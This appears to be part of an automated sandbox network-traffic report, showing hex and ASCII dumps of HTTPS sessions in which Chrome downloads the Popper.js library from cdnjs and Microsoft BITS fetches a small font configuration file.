            Data Ascii: d 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r,e.left+=n*r,e.right+=n*r,e}function f(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return parseFloat(e['border'+o+'Width'],10)+parseFloat(
            2024-09-29 02:32:43 UTC1369INData Raw: 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 54 6f 70 2c 31 30 29 2c 62 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 31 30 29 3b 68 2e 74 6f 70 2d 3d 66 2d 75 2c 68 2e 62 6f 74 74 6f 6d 2d 3d 66 2d 75 2c 68 2e 6c 65 66 74 2d 3d 6d 2d 62 2c 68 2e 72 69 67 68 74 2d 3d 6d 2d 62 2c 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 75 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 62 7d 72 65 74 75 72 6e 28 69 3f 6f 2e 63 6f 6e 74 61 69 6e 73 28 64 29 3a 6f 3d 3d 3d 64 26 26 27 42 4f 44 59
            Data Ascii: left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marginTop,10),b=parseFloat(a.marginLeft,10);h.top-=f-u,h.bottom-=f-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginLeft=b}return(i?o.contains(d):o===d&&'BODY
            2024-09-29 02:32:43 UTC1369INData Raw: 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 65 28 7b 6b 65 79 3a 65 7d 2c 73 5b 65 5d 2c 7b 61 72 65 61 3a 45 28 73 5b 65 5d 29 7d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 72 65 61 2d 65 2e 61 72 65 61 7d 29 2c 61 3d 64 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 77 69 64 74 68 2c 69 3d 65 2e 68 65 69 67 68 74 3b 72 65 74 75 72 6e 20 74 3e 3d 6f 2e 63 6c 69
            Data Ascii: width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(function(e){return se({key:e},s[e],{area:E(s[e])})}).sort(function(e,t){return t.area-e.area}),a=d.filter(function(e){var t=e.width,i=e.height;return t>=o.cli
            2024-09-29 02:32:43 UTC1369INData Raw: 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 2c 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 29 2c 6f 3d 69 28 6f 2c 74 29 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 29 7b 69 66 28 21 74 68 69 73 2e 73 74 61 74 65 2e 69 73 44 65 73 74 72 6f 79 65 64 29 7b 76 61 72 20 65 3d 7b 69 6e 73 74 61 6e 63 65 3a 74 68 69 73 2c 73 74 79 6c 65 73 3a 7b 7d 2c 61 72 72 6f 77 53 74 79 6c 65 73
            Data Ascii: deprecated, use `modifier.fn`!');var i=t['function']||t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.offsets.popper),o.offsets.reference=c(o.offsets.reference),o=i(o,t))}),o}function N(){if(!this.state.isDestroyed){var e={instance:this,styles:{},arrowStyles
            2024-09-29 02:32:43 UTC1369INData Raw: 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 66 75 6e 63 74 69 6f 6e 20 48 28 65 2c 74 2c 6f 2c 69 29 7b 76 61 72 20 72 3d 27 42 4f 44 59 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 72 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 65 3b 70 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 2c 7b 70 61 73 73 69 76 65 3a 21 30 7d 29 2c 72 7c 7c 48 28 6e 28 70 2e 70 61 72 65 6e 74 4e 6f 64 65 29 2c
            Data Ascii: is.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.defaultView:window}function H(e,t,o,i){var r='BODY'===e.nodeName,p=r?e.ownerDocument.defaultView:e;p.addEventListener(t,o,{passive:!0}),r||H(n(p.parentNode),
            2024-09-29 02:32:43 UTC1369INData Raw: 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 69 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 6e 29 7b 76 61 72 20 72 3d 27 60 27 2b 74 2b 27 60 27 3b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 27 2b 6f 2b 27 60 27 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 73 20 72 65 71 75 69 72 65 64 20 62 79 20 27 2b 72 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 77 6f 72 6b 2c 20 62 65 20 73 75 72 65 20 74 6f 20 69 6e 63 6c 75 64 65 20 69 74 20 62 65 66 6f 72 65 20 27 2b 72 2b 27 21 27 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 27 65 6e 64 27 3d 3d 3d 65 3f 27 73 74 61 72 74 27 3a 27 73 74 61 72 74 27 3d 3d
            Data Ascii: tion(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`'+' modifier is required by '+r+' modifier in order to work, be sure to include it before '+r+'!')}return n}function K(e){return'end'===e?'start':'start'==
            2024-09-29 02:32:43 UTC1369INData Raw: 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a 65 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 5b 5d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 56 28 65 2c 6e 2c 74 2c 6f 29 7d 29 7d 29 2c 61 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 69 29 7b 55 28 6f 29 26 26 28 6e 5b 74 5d 2b 3d 6f 2a 28 27 2d 27 3d 3d 3d 65 5b 69 2d 31 5d 3f 2d 31 3a 31 29 29 7d 29 7d 29 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 47 28 65 2c 74 29 7b 76 61 72 20 6f 2c 69 3d 74 2e 6f 66 66 73 65 74 2c 6e 3d 65 2e 70
            Data Ascii: +','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(function(e){return V(e,n,t,o)})}),a.forEach(function(e,t){e.forEach(function(o,i){U(o)&&(n[t]+=o*('-'===e[i-1]?-1:1))})}),n}function G(e,t){var o,i=t.offset,n=e.p
            2024-09-29 02:32:43 UTC1369INData Raw: 2c 69 29 2c 74 7d 7d 28 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6f 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6f 2c 65 7d 2c 73 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 2c 74 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f
            Data Ascii: ,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t]=o,e},se=Object.assign||function(e){for(var t,o=1;o<arguments.length;o++)for(var i in t=arguments[o],t)Object.prototype.hasOwnPro


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            12192.168.2.649732184.28.90.27443
            TimestampBytes transferredDirectionData
            2024-09-29 02:32:44 UTC239OUTGET /fs/windows/config.json HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            Accept-Encoding: identity
            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
            Range: bytes=0-2147483646
            User-Agent: Microsoft BITS/7.8
            Host: fs.microsoft.com
            2024-09-29 02:32:44 UTC515INHTTP/1.1 200 OK
            ApiVersion: Distribute 1.1
            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
            Content-Type: application/octet-stream
            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
            Server: ECAcc (lpl/EF06)
            X-CID: 11
            X-Ms-ApiVersion: Distribute 1.2
            X-Ms-Region: prod-weu-z1
            Cache-Control: public, max-age=137568
            Date: Sun, 29 Sep 2024 02:32:44 GMT
            Content-Length: 55
            Connection: close
            X-CID: 2
            2024-09-29 02:32:44 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            13192.168.2.649733104.17.24.144433576C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-29 02:32:44 UTC388OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
            Host: cdnjs.cloudflare.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-29 02:32:44 UTC930INHTTP/1.1 200 OK
            Date: Sun, 29 Sep 2024 02:32:44 GMT
            Content-Type: application/javascript; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            Cache-Control: public, max-age=30672000
            ETag: W/"5eb03fa9-4af4"
            Last-Modified: Mon, 04 May 2020 16:15:37 GMT
            cf-cdnjs-via: cfworker/kv
            Cross-Origin-Resource-Policy: cross-origin
            Timing-Allow-Origin: *
            X-Content-Type-Options: nosniff
            CF-Cache-Status: HIT
            Age: 877393
            Expires: Fri, 19 Sep 2025 02:32:44 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lDZ4q4RuoEQuaP4cJejxLbPKArMuS9bzDZdJMUSEHmGze%2B6%2F7G17Wigw8FQlm%2F5zkGgWunRnq0MwalB25d6cj6Sl49KoClUfm3UkySTDbSMT4nWaUsN8AQWW%2B9Fi0V3wIxVKuyOG"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
            Strict-Transport-Security: max-age=15780000
            Server: cloudflare
            CF-RAY: 8ca8907deaa215bb-EWR
            2024-09-29 02:32:44 UTC439INData Raw: 34 61 66 34 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
            Data Ascii: 4af4/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
            2024-09-29 02:32:44 UTC1369INData Raw: 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 63 61 73 65 27 23 64 6f 63 75 6d 65 6e 74 27 3a 72 65 74 75 72 6e 20 65 2e 62 6f 64 79 3b 7d 76 61 72 20 69 3d 74 28 65 29 2c 72 3d
            Data Ascii: ComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=
            2024-09-29 02:32:44 UTC1369INData Raw: 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 2c 65 2e 6c 65 66 74 2b 3d 6e 2a 72 2c 65 2e 72 69 67 68 74 2b 3d 6e 2a 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 76 61 72 20 6f 3d 27 78 27 3d 3d 3d 74 3f 27 4c 65 66 74 27 3a 27 54 6f 70 27 2c 69 3d 27 4c 65 66 74 27 3d 3d 6f 3f 27 52 69 67 68 74 27 3a 27 42 6f 74 74 6f 6d 27 3b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74 28 65 5b 27 62 6f 72 64 65 72 27 2b 6f 2b 27 57 69 64 74 68 27 5d 2c 31 30 29 2b 70 61 72 73 65 46 6c 6f 61 74 28
            Data Ascii: d 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r,e.left+=n*r,e.right+=n*r,e}function f(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return parseFloat(e['border'+o+'Width'],10)+parseFloat(
            2024-09-29 02:32:44 UTC1369INData Raw: 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 54 6f 70 2c 31 30 29 2c 62 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 31 30 29 3b 68 2e 74 6f 70 2d 3d 66 2d 75 2c 68 2e 62 6f 74 74 6f 6d 2d 3d 66 2d 75 2c 68 2e 6c 65 66 74 2d 3d 6d 2d 62 2c 68 2e 72 69 67 68 74 2d 3d 6d 2d 62 2c 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 75 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 62 7d 72 65 74 75 72 6e 28 69 3f 6f 2e 63 6f 6e 74 61 69 6e 73 28 64 29 3a 6f 3d 3d 3d 64 26 26 27 42 4f 44 59
            Data Ascii: left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marginTop,10),b=parseFloat(a.marginLeft,10);h.top-=f-u,h.bottom-=f-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginLeft=b}return(i?o.contains(d):o===d&&'BODY
            2024-09-29 02:32:44 UTC1369INData Raw: 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 65 28 7b 6b 65 79 3a 65 7d 2c 73 5b 65 5d 2c 7b 61 72 65 61 3a 45 28 73 5b 65 5d 29 7d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 72 65 61 2d 65 2e 61 72 65 61 7d 29 2c 61 3d 64 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 77 69 64 74 68 2c 69 3d 65 2e 68 65 69 67 68 74 3b 72 65 74 75 72 6e 20 74 3e 3d 6f 2e 63 6c 69
            Data Ascii: width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(function(e){return se({key:e},s[e],{area:E(s[e])})}).sort(function(e,t){return t.area-e.area}),a=d.filter(function(e){var t=e.width,i=e.height;return t>=o.cli
            2024-09-29 02:32:44 UTC1369INData Raw: 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 2c 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 29 2c 6f 3d 69 28 6f 2c 74 29 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 29 7b 69 66 28 21 74 68 69 73 2e 73 74 61 74 65 2e 69 73 44 65 73 74 72 6f 79 65 64 29 7b 76 61 72 20 65 3d 7b 69 6e 73 74 61 6e 63 65 3a 74 68 69 73 2c 73 74 79 6c 65 73 3a 7b 7d 2c 61 72 72 6f 77 53 74 79 6c 65 73
            Data Ascii: deprecated, use `modifier.fn`!');var i=t['function']||t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.offsets.popper),o.offsets.reference=c(o.offsets.reference),o=i(o,t))}),o}function N(){if(!this.state.isDestroyed){var e={instance:this,styles:{},arrowStyles
            2024-09-29 02:32:44 UTC1369INData Raw: 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 66 75 6e 63 74 69 6f 6e 20 48 28 65 2c 74 2c 6f 2c 69 29 7b 76 61 72 20 72 3d 27 42 4f 44 59 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 72 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 65 3b 70 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 2c 7b 70 61 73 73 69 76 65 3a 21 30 7d 29 2c 72 7c 7c 48 28 6e 28 70 2e 70 61 72 65 6e 74 4e 6f 64 65 29 2c
            Data Ascii: is.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.defaultView:window}function H(e,t,o,i){var r='BODY'===e.nodeName,p=r?e.ownerDocument.defaultView:e;p.addEventListener(t,o,{passive:!0}),r||H(n(p.parentNode),
            2024-09-29 02:32:44 UTC1369INData Raw: 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 69 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 6e 29 7b 76 61 72 20 72 3d 27 60 27 2b 74 2b 27 60 27 3b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 27 2b 6f 2b 27 60 27 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 73 20 72 65 71 75 69 72 65 64 20 62 79 20 27 2b 72 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 77 6f 72 6b 2c 20 62 65 20 73 75 72 65 20 74 6f 20 69 6e 63 6c 75 64 65 20 69 74 20 62 65 66 6f 72 65 20 27 2b 72 2b 27 21 27 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 27 65 6e 64 27 3d 3d 3d 65 3f 27 73 74 61 72 74 27 3a 27 73 74 61 72 74 27 3d 3d
            Data Ascii: tion(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`'+' modifier is required by '+r+' modifier in order to work, be sure to include it before '+r+'!')}return n}function K(e){return'end'===e?'start':'start'==
            2024-09-29 02:32:44 UTC1369INData Raw: 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a 65 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 5b 5d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 56 28 65 2c 6e 2c 74 2c 6f 29 7d 29 7d 29 2c 61 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 69 29 7b 55 28 6f 29 26 26 28 6e 5b 74 5d 2b 3d 6f 2a 28 27 2d 27 3d 3d 3d 65 5b 69 2d 31 5d 3f 2d 31 3a 31 29 29 7d 29 7d 29 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 47 28 65 2c 74 29 7b 76 61 72 20 6f 2c 69 3d 74 2e 6f 66 66 73 65 74 2c 6e 3d 65 2e 70
            Data Ascii: +','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(function(e){return V(e,n,t,o)})}),a.forEach(function(e,t){e.forEach(function(o,i){U(o)&&(n[t]+=o*('-'===e[i-1]?-1:1))})}),n}function G(e,t){var o,i=t.offset,n=e.p
            2024-09-29 02:32:44 UTC1369INData Raw: 2c 69 29 2c 74 7d 7d 28 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6f 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6f 2c 65 7d 2c 73 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 2c 74 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f
            Data Ascii: ,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t]=o,e},se=Object.assign||function(e){for(var t,o=1;o<arguments.length;o++)for(var i in t=arguments[o],t)Object.prototype.hasOwnPro


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            14192.168.2.649736104.18.10.2074433576C:\Program Files\Google\Chrome\Application\chrome.exe
